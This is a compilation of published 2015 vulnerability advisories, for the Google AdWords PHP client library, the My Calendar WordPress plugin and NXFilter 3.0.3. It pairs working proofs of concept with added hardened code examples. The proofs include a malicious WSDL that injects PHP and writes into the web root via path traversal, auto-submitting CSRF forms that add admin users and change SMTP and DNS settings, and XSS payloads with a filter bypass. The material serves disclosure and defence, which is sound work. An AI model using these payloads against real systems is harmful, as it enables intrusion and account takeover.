- AdWords API
https://developers.google.com/adwords/api/docs/
"The AdWords API is a collection of web services that you can use to build
applications that manage AdWords accounts and their associated campaign data.
While the AdWords API is based on SOAP 1.1, high-level client libraries are
provided to help you develop applications more quickly."
AdWords API client libraries are available for different platforms
such as PHP, .NET, Java etc.
These can be found at:
https://developers.google.com/adwords/api/docs/clientlibraries
III. INTRODUCTION
-------------------------
The Google AdWords API client library for PHP contains a WSDL Interpreter
class which is described in a comment within the source code as:
"
* The main class for handling WSDL interpretation.
*
* The WSDLInterpreter is utilized for the parsing of a WSDL document for rapid
* and flexible use within the context of PHP 5 scripts.
"
The class contains a function savePHP() which converts the WSDL document
received from a remote end into a PHP file.
The function is vulnerable to path traversal and code injection.
IV. DESCRIPTION
-------------------------
googleads-php-lib contains the following function, which loads the WSDL
document (XML data) from the remote Google AdWords server:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
protected function loadWsdl($wsdlUri, $proxy = null) {
  // Set proxy.
  if ($proxy) {
    $opts = array(
        'http' => array(
            'proxy' => $proxy,
            'request_fulluri' => true
        )
    );
    $context = stream_context_get_default($opts);
    libxml_set_streams_context($context);
  }
  $this->dom = new DOMDocument();
  $this->dom->load($wsdlUri,
      LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);
-------------------------------------------------------
For security reasons the Google AdWords API should only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the
https:// stream context.
It fails to assign a Certificate Authority (CA) bundle, turn the verify_peer
option on, specify allowed ciphers, etc.
It uses the stream_context_get_default() function to get the default context,
which on all PHP versions below 5.6 (see references) does not validate the
server certificate by default.
Because of this, applications may retrieve data from untrusted sources
pretending to be adwords.google.com.
Further on, the WSDLInterpreter class contains the following savePHP function:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
/**
* Saves the PHP source code that has been loaded to a target directory.
*
* Services will be saved by their validated name, and classes will be
* included with each service file so that they can be utilized independently.
*
* @param string $outputDirectory the destination directory for the source
* code
* @return array array of source code files that were written out
* @throws WSDLInterpreterException problem in writing out service sources
*/
public function savePHP($outputDirectory) {
  if (!count($this->servicePHPSources)) {
    throw new WSDLInterpreterException("No services loaded");
  }
  $namespace = $this->enableNamespaces ? sprintf("namespace %s;\n\n",
      $this->utils->getNamespace()) : '';
  $require = sprintf("require_once \"%s\";\n\n", $this->soapClientClassPath);
  $classSource = join("\n\n", $this->classPHPSources);
  $outputFiles = array();
  foreach ($this->servicePHPSources as $serviceName => $serviceCode) {
    $filename = sprintf('%s/%s.php', $outputDirectory, $serviceName);
    $success = file_put_contents($filename, sprintf(
        "<?php\n%s%s%s%s\n\n%s\n\n", $this->getFileHeader(), $namespace,
        $require, $classSource, $serviceCode));
...
-------------------------------------------------------
The function does not sufficiently sanitise the WSDL document received from
the remote end. The service name is used as-is in the output filename, so an
injected '../' sequence lets an attacker save the resulting PHP file into an
arbitrary directory on the system.
It also fails to validate the namespace provided within the WSDL document,
which is written into a PHP string constant in the generated file; a quote
followed by PHP code (hex-encoded in the WSDL) therefore ends up as live code.
For the attack to be successful, the attacker needs to perform a MitM attack
to impersonate the adwords.google.com server (e.g. via DNS poisoning/spoofing,
proxy attacks, ARP spoofing, etc.) to inject malicious XML.
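The validation that savePHP() lacks, as an added example that is not googleads-php-lib code. The service name is restricted to a plain identifier before it becomes a file stem and class name, the resulting path is confined to the output directory with realpath(), and both WSDL-supplied strings are embedded in the generated PHP through var_export() so a quote in the data cannot terminate the string literal. The generated file is reduced to the two constants that matter, and demo() runs the advisory's traversal value, its injected namespace and a benign pair through the checks against a temporary directory created on the fly (PHP 7.1+).

```php
<?php
// Added example, not googleads-php-lib code: input validation and path
// confinement for the savePHP() pattern from section IV. The generated file
// layout is simplified; the sample names are taken from the advisory and the
// output directory is a temp dir created by demo().

declare(strict_types=1);

/** A service name may only become a simple PHP identifier / file stem. */
function validServiceName(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,127}$/', $name);
}

/** A namespace must look like a URI: scheme, colon, printable non-space chars, no quotes. */
function validNamespace(string $ns): bool
{
    return (bool) preg_match('/^[A-Za-z][A-Za-z0-9+.\-]*:[\x21-\x7e]{1,512}$/', $ns)
        && strpos($ns, '"') === false && strpos($ns, "'") === false;
}

/**
 * Confine the target path to $outputDirectory. Even if the name check were
 * loosened later, a "../" could not move the file out of the directory.
 */
function confinedPath(string $outputDirectory, string $serviceName): string
{
    $base = realpath($outputDirectory);
    if ($base === false) {
        throw new RuntimeException('Output directory does not exist');
    }
    $target = $base . DIRECTORY_SEPARATOR . $serviceName . '.php';
    if (realpath(dirname($target)) !== $base) {
        throw new RuntimeException('Path escapes output directory');
    }
    return $target;
}

/**
 * Hardened equivalent of the savePHP() loop body: validate, confine, and
 * embed strings with var_export() so a quote in the data cannot close the
 * PHP string literal.
 */
function savePHPSafe(string $outputDirectory, string $serviceName, string $namespace): string
{
    if (!validServiceName($serviceName)) {
        throw new InvalidArgumentException("Rejected service name: $serviceName");
    }
    if (!validNamespace($namespace)) {
        throw new InvalidArgumentException("Rejected namespace: $namespace");
    }
    $file = confinedPath($outputDirectory, $serviceName);
    $code = sprintf(
        "<?php\nclass %s {\n    const SERVICE_NAME = %s;\n    const WSDL_NAMESPACE = %s;\n}\n",
        $serviceName,
        var_export($serviceName, true),
        var_export($namespace, true)
    );
    if (file_put_contents($file, $code) === false) {
        throw new RuntimeException("Could not write $file");
    }
    return $file;
}

/** Run the advisory's two malicious values and one benign pair through the checks. */
function demo(): array
{
    $out = sys_get_temp_dir() . '/wsdl_out_' . bin2hex(random_bytes(4));
    mkdir($out, 0700);
    $cases = [
        'traversal' => ['../../../var/www/html/POC_Exploit', 'urn:POC_RCE'],
        'injection' => ['CampaignService', 'urn:POCexploit444"; public function __destruct() { `/bin/touch /tmp/x`; } const NOTHING = "'],
        'benign'    => ['CampaignService', 'https://adwords.google.com/api/adwords/cm/v201502'],
    ];
    $results = [];
    foreach ($cases as $label => [$name, $ns]) {
        try {
            $results[$label] = 'written: ' . savePHPSafe($out, $name, $ns);
        } catch (InvalidArgumentException | RuntimeException $e) {
            $results[$label] = 'rejected: ' . $e->getMessage();
        }
    }
    return $results;
}

var_export(demo());
```

Validation on the two attacker-controlled strings is the primary fix; the realpath() confinement and var_export() escaping are defence in depth, and none of this replaces verifying the TLS peer, since a WSDL that is never accepted from an impostor needs no sanitising.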
V. PROOF OF CONCEPT
-------------------------
Below is a test application that makes use of the PHP Google AdWords API library.
The application simply connects to the AdWords API endpoint to retrieve the
Google API WSDL document and translates it into a PHP file.
---[ testAPI.php ]---
<?php
// Test application reading WSDL from Google AdWords
set_include_path('./build_lib/WSDLInterpreter/');
require_once 'WSDLInterpreter.php';
$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'
.'CampaignService?wsdl';
$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null,
null, "CampaignService", "v201502", "Ads_Google",
"./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);
$wsdlInterpreter->savePHP('/tmp/');
?>
---------------------
To exploit this application, an attacker needs to perform a MitM attack
to impersonate the adwords.google.com server, as mentioned in the description above.
If the attacker manages to return the XML below when the victim requests
https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl
from the Google AdWords endpoint:
---[ malicious XML ]---
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns:typens="urn:POC_RCE"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/"
name="POCexploit" targetNamespace="urn:POCexploit444"; public function __destruct() { $exfoo = `/bin/touch /tmp/adwords_api_hacked`; } const NOTHING = "">
<service name="../../../var/www/html/POC_Exploit">
<port name="Some_HandlerPort" binding="typens:Some_HandlerBinding">
<soap:address location="https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl" />
</port>
</service>
</definitions>
----------------------
the vulnerable application will translate it and save it as a script at
/var/www/html/POC_Exploit.php (assuming the directory is writable) instead
of under /tmp, due to the path traversal in the '<service name=' attribute.
It will also decode the hex values representing the injected PHP fragment to:
"; public function __destruct() { $exfoo = `/bin/touch /tmp/adwords_api_hacked`; }
const NOTHING = "
The resulting file, saved as /var/www/html/POC_Exploit.php, will look as
follows after the WSDL to PHP translation:
---[ resulting POC_Exploit.php file ]---
<?php
/**
[cut]
* @package Ads_Google
* @subpackage v201309
* @category WebServices
* @copyright 2014, Google Inc. All Rights Reserved.
* @license http://www.apache.org/licenses/LICENSE-2.0 Apache License,
* Version 2.0
*/
namespace Ads_Google;
require_once "../../src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php";
if (!class_exists("VarwwwhtmlPOC_Exploit", false)) {
/**
* VarwwwhtmlPOC_Exploit
* @package Ads_Google
* @subpackage v201309
*/
class VarwwwhtmlPOC_Exploit extends AdWordsSoapClient {
const SERVICE_NAME = "../../../var/www/html/POC_Exploit";
const WSDL_NAMESPACE = "urn:POCexploit444"; public function __destruct() { $exfoo = `/bin/touch /tmp/adwords_api_hacked`; } const NOTHING = "";
const ENDPOINT = "https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl";
/**
* The endpoint of the service
* @var string
*/
public static $endpoint = "https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl";
/**
* Constructor using wsdl location and options array
* @param string $wsdl WSDL location for this service
* @param array $options Options for the SoapClient
*/
public function __construct($wsdl, $options, $user) {
$options["classmap"] = self::$classmap;
parent::__construct($wsdl, $options, $user, self::SERVICE_NAME,
self::WSDL_NAMESPACE);
}
}
}
----------------------------------------
If such a class gets included, the injected __destruct() method executes the
malicious code, which creates the /tmp/adwords_api_hacked file.
At this point the attacker controls the name of the class (through the service
name) and the path of the resulting PHP file, and is able to inject arbitrary
PHP code.
Going further, he could close the class definition and write arbitrary PHP
code at the top level of the file.
This would allow the attacker to create a stand-alone script which he could
request remotely via the web server if he managed to save it within the web
root.
In this way the attacker could plant a stand-alone PHP command shell and gain
access to the system.
VI. BUSINESS IMPACT
-------------------------
The severity of this issue is lowered to medium/high as despite the possibility
to execute arbitrary code, the attacker must impersonate adwords.google.com
server to be able to inject malicious XML.
If there is a possibility for such an attack, the severity of the issue
can grow to high/critical.
VII. SYSTEMS AFFECTED
-------------------------
Google AdWords API PHP client library versions up to 6.2.0 contain the
vulnerable WSDLInterpreter code.
VIII. SOLUTION
-------------------------
Upgrade Google AdWords API PHP client library to the latest version.
IX. REFERENCES
-------------------------
This advisory:
http://legalhackers.com/advisories/Google-AdWords-PHP-Client-library-PHP-Code-Execution.txt
Related, Google AdWords API client libraries - XML eXternal Entity Injection (XXE) vuln:
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt
https://github.com/googleads/googleads-php-lib
https://github.com/googleads/googleads-php-lib/blob/master/ChangeLog.md
https://developers.google.com/adwords/api/docs/
https://developers.google.com/adwords/api/docs/clientlibraries
PHP 5.6.x openssl certificates in PHP streams:
http://php.net/manual/en/migration56.openssl.php
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
May 18th, 2015: Advisory created and sent to Google Security Team
Nov 5th, 2015: Google, after half a year, confirms the vulnerability has been patched
Nov 6th, 2015: Advisory released publicly
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
Exploit Title: My Calendar 2.4.10 CSRF and XSS
Exploit Author : Mysticism (Ahn Sung Jun)
Date : 2015-11-06
Vendor Homepage : http://wordpress.org/plugins/my-calendar
Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip
Version : 2.4.10
Tested On : Kali Linux, Iceweasel
===================
Vulnerable Code : my-calendar-categories.php
if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) {
    $term = wp_insert_term( $_POST['category_name'], 'mc-event-category' );
    if ( ! is_wp_error( $term ) ) {
        $term = $term['term_id'];
    } else {
        $term = false;
    }
    $add = array(
        'category_name'    => $_POST['category_name'],
        'category_color'   => $_POST['category_color'],
        'category_icon'    => $_POST['category_icon'],
        'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ),
        'category_term'    => $term
    );
}
POC (CSRF & XSS)
<html>
<body onload="javascript:document.forms[0].submit()">
<form id="my-calendar" method="post" action="http://192.168.0.2/wordpress/wp-admin/admin.php?page=my-calendar-categories">
<input type="hidden" name="_wpnonce" value="35ed9ab206"/>
<input type="hidden" name="mode" value="add"/>
<input type="hidden" name="category_id" value="4"/>
<input name="category_name" id="cat_name" type="hidden" class="input" size="30" value="<script>alert(document.cookie)</script>">
<input type="hidden" id="cat_color" name="category_color" class="mc-color-input" size="10" maxlength="7" value=""/>
<input type="hidden" value="on" name="category_private" id="cat_private" />
<input type="hidden" value="on" name="mc_default_category" id="mc_default_category" />
<input type="hidden" value="on" name="mc_skip_holidays_category" id="mc_shc" />
<input type="submit" name="save" class="button-primary" value="Add Category »"/>
</form>
</html>
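The handler quoted above reads the POST body without verifying a nonce, checking a capability, or sanitizing the category fields, and the proof-of-concept shows the result. The following is an added example, not the My Calendar plugin's own code: a hardened form of the same handler built on the WordPress APIs. The nonce action name 'mc_add_category' and the function names are hypothetical labels chosen for this example.

```php
<?php
// Added example, not code from the My Calendar plugin. A hardened version of the
// category "add" handler: the request must carry a nonce bound to this action and
// to the logged-in user (defeats CSRF), the user must hold a capability (a nonce
// proves intent, not privilege), input is sanitized before storage, and the value
// is escaped when echoed back (defeats stored XSS). The nonce action name
// 'mc_add_category' is a hypothetical label for this example.

function mc_handle_add_category_hardened(): ?int
{
    if ( ! isset( $_POST['mode'] ) || $_POST['mode'] !== 'add' ) {
        return null; // not our action
    }

    // CSRF: check_admin_referer() compares $_POST['_wpnonce'] against the
    // current user's session-bound, time-limited nonce and calls wp_die()
    // on mismatch. A value copied into an attacker's page cannot match.
    check_admin_referer( 'mc_add_category' );

    // Authorization: only users allowed to manage the site may add categories.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'You are not allowed to add categories.', 'my-calendar' ),
            '',
            array( 'response' => 403 )
        );
    }

    // Input sanitization: strip tags and control characters from the name,
    // accept only a #rrggbb colour, and keep the icon to a plain file name.
    $name  = sanitize_text_field( wp_unslash( $_POST['category_name'] ?? '' ) );
    $color = (string) wp_unslash( $_POST['category_color'] ?? '' );
    $color = preg_match( '/\A#[0-9A-Fa-f]{6}\z/', $color ) ? $color : '';
    $icon  = sanitize_file_name( wp_unslash( $_POST['category_icon'] ?? '' ) );

    if ( $name === '' ) {
        return null; // nothing to add
    }

    $term    = wp_insert_term( $name, 'mc-event-category' );
    $term_id = is_wp_error( $term ) ? false : (int) $term['term_id'];

    $add = array(
        'category_name'    => $name,
        'category_color'   => $color,
        'category_icon'    => $icon,
        'category_private' => isset( $_POST['category_private'] ) ? 1 : 0,
        'category_term'    => $term_id,
    );
    // ... persist $add exactly as the original handler does ...

    return $term_id ?: null;
}

// Output: escape at the point of rendering, so a stored name such as
// <script>alert(document.cookie)</script> is displayed as text, not executed.
function mc_render_category_name( string $name ): string
{
    return '<td>' . esc_html( $name ) . '</td>';
}

// The plugin's own form must emit the matching nonce field:
//   wp_nonce_field( 'mc_add_category' );
```

Note that the proof-of-concept above already posts a `_wpnonce` field; it only succeeds because the original handler never checks it. Once `check_admin_referer()` is in place, the hard-coded value is rejected, since a valid nonce is derived from the victim's own session and expires.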
Discovered By
Mysticism(Ahn Sung Jun)
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt
Vendor:
================================
www.nxfilter.org/p2/
Product:
================================
NXFilter v3.0.3
Vulnerability Type:
=================================
Cross site request forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF protections exist, allowing us to make malicious HTTP requests on
behalf of our victim.
The server will then happily process any of the following actions if our
victim clicks our infected linx or visits our malicious website while
logged in to the vulnerable application.
1) "add arbitrary users"
2) "add or change SMTP settings"
3) "add arbitrary redirect domains"
4) "add arbitrary zone transfers"
5) "delete zone transfer domains"
Exploit code(s):
===============
<!DOCTYPE>
<html>
<head>
<title></title>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) CSRF add arbitrary users
<form id="HELL" action="http://localhost/user,user.jsp" method="post">
<input type="text" name="action_flag" value="insert" >
<input type="text" name="name" value="punksnotdead">
<input type="text" name="description" value="<script>alert(666)</script>">
<---- and some persistent XSS!
</form>
2) CSRF add or change SMTP notification alerts
<form id="HELL" action="http://localhost/config,alert.jsp" method="post">
<input type="text" name="action_flag" value="update" >
<input type="text" name="admin_email" value="ghostofsin@abyss.com">
<input type="text" name="smtp_host" value="6.6.6.0">
<input type="text" name="smtp_port" value="25">
<input type="text" name="smtp_user" value="hyp3rlinx">
<input type="text" name="smtp_passwd" value="abc123">
<input type="text" name="period" value="0">
<input type="text" name="token" value="">
</form>
3) CSRF add arbitrary redirect domain
<form id="HELL" action="http://localhost/config,redirection.jsp" method="post">
<input type="text" name="action_flag" value="insert" >
<input type="text" name="src" value="hyp3rlinx.altervista.org">
<input type="text" name="dst" value="6.6.6.0">
</form>
4) CSRF add arbitrary zone transfers
<form id="HELL" action="http://localhost/config,zone_transfer.jsp" method="post">
<input type="text" name="action_flag" value="insert" >
<input type="text" name="domain" value="hyp3rlinx.altervista.org">
<input type="text" name="ip" value="6.6.6.0">
</form>
5) CSRF delete zone transfer domains
http://localhost/config,zone_transfer.jsp?action_flag=delete&id=1
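Every request in the list above succeeds for one reason: the server accepts a state-changing request without any proof that its own page issued it. The following is an added example of the synchronizer-token pattern that would have blocked them; NXFilter is a Java/JSP application and this is not its code, the pattern is shown in PHP for consistency with the rest of this page. The function names and the `$session` array (standing in for a real session store) are this example's own.

```php
<?php
// Added example; NXFilter is a Java/JSP application and this is not its code.
// Synchronizer-token pattern: the server keeps one random token per session,
// embeds it in each of its own forms, and refuses any state-changing request
// that does not echo it back. A cross-site page cannot read the token because
// the same-origin policy hides the HTML of a cross-site response from it.
// Item 5 above changes state over GET; such requests are rejected outright.

const CSRF_TOKEN_BYTES = 32;

// Issue (or reuse) the per-session token. $session stands in for $_SESSION so
// the example runs from the CLI without a real session.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(CSRF_TOKEN_BYTES));
    }
    return $session['csrf_token'];
}

// Hidden field for the application's own forms.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Gate for every handler that changes state: true if the request may proceed,
// false if it must be answered with 403 and not processed.
function csrf_request_allowed(string $method, array $params, array &$session): bool
{
    // State changes must use POST; a GET such as ...?action_flag=delete&id=1
    // is refused regardless of what it carries.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $params['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || $given === '') {
        return false;
    }
    // Constant-time comparison: no timing side channel on the token bytes.
    return hash_equals($expected, $given);
}

// Constructed requests: what a cross-site form (which cannot know the token)
// produces, a state change attempted over GET, and the application's own form.
$session = [];
$token   = csrf_token($session);

$forged  = ['action_flag' => 'insert', 'name' => 'punksnotdead'];
$getOnly = ['action_flag' => 'delete', 'id' => '1', 'csrf_token' => $token];
$genuine = ['action_flag' => 'insert', 'name' => 'alice', 'csrf_token' => $token];

var_dump(csrf_request_allowed('POST', $forged, $session));
var_dump(csrf_request_allowed('GET', $getOnly, $session));
var_dump(csrf_request_allowed('POST', $genuine, $session));
echo csrf_field($session), "\n";
```

The forged POST and the GET delete are both refused, and only the request that carries the session's token over POST is allowed. Binding the token to the session rather than to a fixed value is what makes the difference: a constant or predictable token could simply be copied into the attacker's form, as the proof-of-concept forms above do with every other field.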
Disclosure Timeline:
======================================
Vendor Notification: October 18, 2015
November 5, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Description:
==========================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] NXFilter v3.0.3
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt
Vendor:
================================
www.nxfilter.org/p2/
Product:
================================
NXFilter v3.0.3
Vulnerability Type:
=========================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Persistent & reflected XSS entry points exist, allowing arbitrary client-side
browser code execution on victims who click our infected linx or visit
persistently stored XSS payloads. XSS strings seem to get filtered, yet we can
defeat that using the JS String.fromCharCode() function.
Exploit code(s):
===============
1) persistent XSS under category / custom
The "name" parameter is vulnerable to persistent XSS injection using the POST
method.
http://localhost/category,custom.jsp
<input type="text" name="description" value="<script>alert(666)</script>" size="50">
2) reflected XSS
http://localhost/classifier,ruleset.jsp?action_flag=&page=1&kw=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&id=&domain=&keyword=&points=
3) reflected XSS
http://localhost/report,daily.jsp?stime=2015%2F10%2F17&time_option=yesterday&user=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E
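The fix for both the stored and the reflected cases above is the same, and it is not a better filter: encode at the output context. A keyword filter is exactly what the String.fromCharCode() variant routes around, whereas an encoder does not care what the characters spell, only where they land. The following is an added example, not NXFilter code, written in PHP for consistency with the rest of this page; the function names and the rendered form are this example's own.

```php
<?php
// Added example, not NXFilter code. Contextual output encoding for the two
// places the advisory's payloads land: text between tags (the stored
// description) and a double-quoted attribute value (the reflected kw / user
// parameters, whose payloads start with "/> to close the tag they sit in).

// Text placed between tags, e.g. a category description in a table cell.
function html_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Text placed inside a double-quoted attribute value. Quotes must be encoded
// here as well, otherwise a value beginning with "/> terminates the attribute
// and the tag, and everything after it is parsed as markup.
function html_attr(string $s): string
{
    return '"' . htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8') . '"';
}

// A hypothetical search form that echoes the kw parameter back into its input
// box, plus a result cell showing a stored description, both encoded.
function render_search_page(string $kw, string $description): string
{
    return '<form method="get">'
        . '<input type="text" name="kw" value=' . html_attr($kw) . '>'
        . '</form>'
        . '<table><tr><td>' . html_text($description) . '</td></tr></table>';
}

// Constructed inputs in the shapes used by the advisory above. The obfuscated
// variant is treated identically: encoding acts on < > " ' & regardless of
// what the surrounding script text computes at run time.
$reflected  = '"/><script>alert(666)</script>';
$obfuscated = '"/><script>alert(String.fromCharCode(72)+String.fromCharCode(69))</script>';
$stored     = '<script>alert(666)</script>';

echo render_search_page($reflected, $stored), "\n";
echo render_search_page($obfuscated, $stored), "\n";
```

In the rendered output every `<`, `>` and `"` from the parameters appears as an entity, so the browser shows the payload as literal text inside the input box and the cell. Choosing the encoder per context (text node versus attribute value) is the part a single global "sanitize" step tends to get wrong.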
Disclosure Timeline:
=======================================
Vendor Notification: October 18, 2015
November 5, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===================================================
High
Description:
==================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] NXFilter v3.0.3
Vulnerable Parameter(s): [+] name, user, kw
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx